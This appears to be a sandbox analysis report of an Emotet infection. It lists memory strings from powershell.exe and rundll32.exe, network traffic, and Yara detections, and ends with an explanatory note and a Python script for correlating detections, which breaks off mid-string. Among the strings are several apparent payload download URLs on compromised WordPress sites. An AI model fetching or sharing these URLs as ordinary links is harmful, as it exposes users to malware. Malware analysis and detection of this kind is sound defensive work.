Source: powershell.exe, 00000005.00000002.2326644631.0000000001F69000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.gva.es0
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sectigo.com0/
Source: powershell.exe, 00000005.00000002.2334569128.000000001CFEE000.00000004.00000001.sdmp String found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
Source: powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmp String found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: powershell.exe, 00000005.00000002.2326937839.00000000023D0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000005.00000002.2336945072.000000001D560000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335520346.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331519355.0000000001FA7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2335196008.0000000001FA7000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmp String found in binary or memory: http://traumfrauen-ukraine.de
Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp String found in binary or memory: http://traumfrauen-ukraine.de/bin/JyeS/
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335520346.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331519355.0000000001FA7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2335196008.0000000001FA7000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2326937839.00000000023D0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmp String found in binary or memory: http://www.a-cert.at/certificate-policy.html0
Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmp String found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmp String found in binary or memory: http://www.a-cert.at0E
Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp String found in binary or memory: http://www.acabogacia.org/doc0
Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp String found in binary or memory: http://www.acabogacia.org0
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp String found in binary or memory: http://www.ancert.com/cps0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
Source: powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmp String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp String found in binary or memory: http://www.certifikat.dk/repository0
Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: powershell.exe, 00000005.00000003.2325947854.000000001D025000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3.crl0
Source: powershell.exe, 00000005.00000002.2334351202.000000001CF80000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://www.chambersign.org1
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://www.comsign.co.il/cps0
Source: powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmp String found in binary or memory: http://www.crc.bg0
Source: powershell.exe, 00000005.00000002.2326644631.0000000001F69000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmp String found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
Source: powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmp String found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmp String found in binary or memory: http://www.disig.sk/ca0f
Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp String found in binary or memory: http://www.dnie.es/dpc0
Source: powershell.exe, 00000005.00000002.2334569128.000000001CFEE000.00000004.00000001.sdmp String found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp String found in binary or memory: http://www.e-me.lv/repository0
Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp String found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmp String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
Source: powershell.exe, 00000005.00000003.2325947854.000000001D025000.00000004.00000001.sdmp String found in binary or memory: http://www.entrust.net/CRL/net1.crl0
Source: powershell.exe, 00000005.00000002.2326313954.0000000000182000.00000004.00000020.sdmp String found in binary or memory: http://www.firmaprofesional.com0
Source: powershell.exe, 00000005.00000002.2326325895.00000000001A1000.00000004.00000020.sdmp String found in binary or memory: http://www.globaltrust.info0
Source: powershell.exe, 00000005.00000002.2326325895.00000000001A1000.00000004.00000020.sdmp String found in binary or memory: http://www.globaltrust.info0=
Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335520346.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331519355.0000000001FA7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2335196008.0000000001FA7000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmp String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000003.2326018353.000000001CFE9000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.gva.es/cps0
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.gva.es/cps0%
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmp String found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
Source: powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmp String found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp String found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
Source: powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmp String found in binary or memory: http://www.signatur.rtr.at/current.crl0
Source: powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmp String found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
Source: powershell.exe, 00000005.00000002.2334526019.000000001CFE3000.00000004.00000001.sdmp String found in binary or memory: http://www.ssc.lt/cps03
Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/guidelines0
Source: powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmp String found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: http://www.valicert.
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: http://www.valicert.1
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: http://www.valicert.com/1
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: rundll32.exe, 00000008.00000002.2334588090.0000000001DC0000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2326597229.0000000001ECE000.00000004.00000001.sdmp String found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmp String found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
Source: powershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmp String found in binary or memory: https://jflmktg.wpcomstaging.com
Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp String found in binary or memory: https://jflmktg.wpcomstaging.com/wp-content/AK/
Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp String found in binary or memory: https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
Source: powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmp String found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000005.00000002.2331489213.0000000003B6A000.00000004.00000001.sdmp String found in binary or memory: https://shop.nowfal.dev
Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp String found in binary or memory: https://shop.nowfal.dev/wp-includes/RlMObf2j0/
Source: powershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmp String found in binary or memory: https://traumfrauen-ukraine.de
Source: powershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmp String found in binary or memory: https://traumfrauen-ukraine.de/bin/JyeS/
Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmp String found in binary or memory: https://www.catcert.net/verarrel
Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmp String found in binary or memory: https://www.catcert.net/verarrel05
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp String found in binary or memory: https://www.netlock.hu/docs/
Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmp String found in binary or memory: https://www.netlock.net/docs
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443

E-Banking Fraud:

Yara detected Emotet
Source: Yara match File source: 00000016.00000002.2368006651.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2369643612.0000000000180000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2339483010.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2335393724.0000000000280000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2352976974.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2363852482.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2370162675.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2333967935.0000000000280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2342378229.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2347071363.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2485894589.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2368454329.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2335519485.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2351415450.0000000000750000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2358322887.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2370274121.0000000000550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2486292831.0000000002010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2355550940.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2343974004.00000000004A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2368531156.0000000000450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2360129710.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2338149952.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2343885574.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2359551824.0000000000460000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2364687136.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2355569966.0000000000750000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2352906309.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2351067576.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2333875086.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2355670534.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2342497051.0000000000280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2367980145.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2338123179.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2335352749.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2339586653.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2330883211.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2339441337.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2485863461.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2347031079.0000000000280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2348536550.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2360111276.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2358696763.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2360228021.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2352930564.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2351291099.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2348563781.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2343843229.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2348503069.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 20.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.430000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.930000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.6b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.550000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.280000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.930000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.4a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.rundll32.exe.2010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.rundll32.exe.450000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.4a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.rundll32.exe.2010000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.460000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.430000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.750000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.rundll32.exe.450000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.460000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.550000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
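The MEMORY hits and the UNPACKEDPE hits above describe the same regions twice. The .sdmp name carries the process index and base address in hex (00000016 ... 0000000000450000), the unpacked-PE name carries them in decimal and short hex (22.2.rundll32.exe.450000.1), and a 00000040 protection field is PAGE_EXECUTE_READWRITE, i.e. the Yara rule fired on writable executable memory inside rundll32.exe rather than on anything on disk. The script below is an added example for this page, not Joe Sandbox code. It joins the two lists on (process, base address) so an analyst can see which RWX regions have a rebuilt PE to pull and which have none and need a manual look. The PAGE_* and MEM_* constants are the documented Windows values; the reading of the .sdmp name as process.state.dumpid.base.protection.regiontype is my assumption, and the 00000001 region type that appears in the report is not a documented MEM_* value, so it is left as raw hex. The sample lines are a constructed subset of the report.

```python
"""Join the Yara MEMORY hits of a sandbox report with its UNPACKEDPE hits.

Added example for this page; not Joe Sandbox code.  SAMPLE_LINES is a
constructed subset copied from the report.  The .sdmp field layout is an
assumption; PAGE_*/MEM_* values are the documented Windows constants.
"""
import re
from collections import defaultdict

SAMPLE_LINES = """\
Source: Yara match File source: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2368531156.0000000000450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2330883211.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.rundll32.exe.430000.1.raw.unpack, type: UNPACKEDPE
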